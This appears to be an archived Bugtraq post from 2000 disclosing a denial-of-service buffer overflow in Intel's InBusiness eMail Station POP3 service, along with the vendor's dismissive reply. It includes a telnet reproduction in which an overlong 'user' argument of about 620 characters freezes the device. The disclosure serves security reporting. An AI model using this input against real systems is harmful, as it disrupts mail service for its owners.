[17282] in bugtraq
DoS in Intel corporation 'InBusiness eMail Station'
daemon@ATHENA.MIT.EDU (=?iso-8859-1?Q?Knud_Erik_H=F8jgaar)
Fri Oct 20 12:56:23 2000
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
Message-Id: <MMEEJPEPBPAOHOAFGCKPCEGBCDAA.knud@cybercity.dk>
Date: Fri, 20 Oct 2000 14:05:52 +0200
Reply-To: =?iso-8859-1?Q?Knud_Erik_H=F8jgaard_-_CyberCity_Support?= <knud@CYBERCITY.DK>
From: =?iso-8859-1?Q?Knud_Erik_H=F8jgaard_-_CyberCity_Support?= <knud@CYBERCITY.DK>
To: BUGTRAQ@SECURITYFOCUS.COM
Intel corporation 'InBusiness eMail Station' firmware version 1.04.87
(latest) Denial of service vulnerability.
Vendor notification date: 20/10-2000
Public notification date: 20/10-2000
Problem: I found a buffer overflow in the Intel InBusiness eMail Station,
which
can enable an attacker to execute a denial of service attack against it.
Disclaimer: For educational purposes only.
example :
[foo@bar]$ telnet mailstation 110
Trying mailstation...
Connected to mailstation.
Escape character is '^]'.
+OK Pop server at mailstation starting. <2831812.972049732@mail>
user [buffer]
where [buffer] is appx. 620 chars of your own choice.(tried A and %, expect
all to work)
Symptoms: The box(a nice little piece of hardware with built-in harddrive
and all) will stop responding, and needs a power cycle to restore function.
Reason for posting same date as vendor notification: Intel was contacted
and informed of the bug, and all they had to say was "You're using it in a
way its not supposed to be used" (i told them it was on a leased line) - in
their opinion it doesn't matter since its possible to connect a modem to it,
and use it for retrieving mail and distributing it locally.
Sincerely (and a big thanks to Intel for not caring about product security
at all)
Knud Erik Hxjgaard <kain@perker.dk>
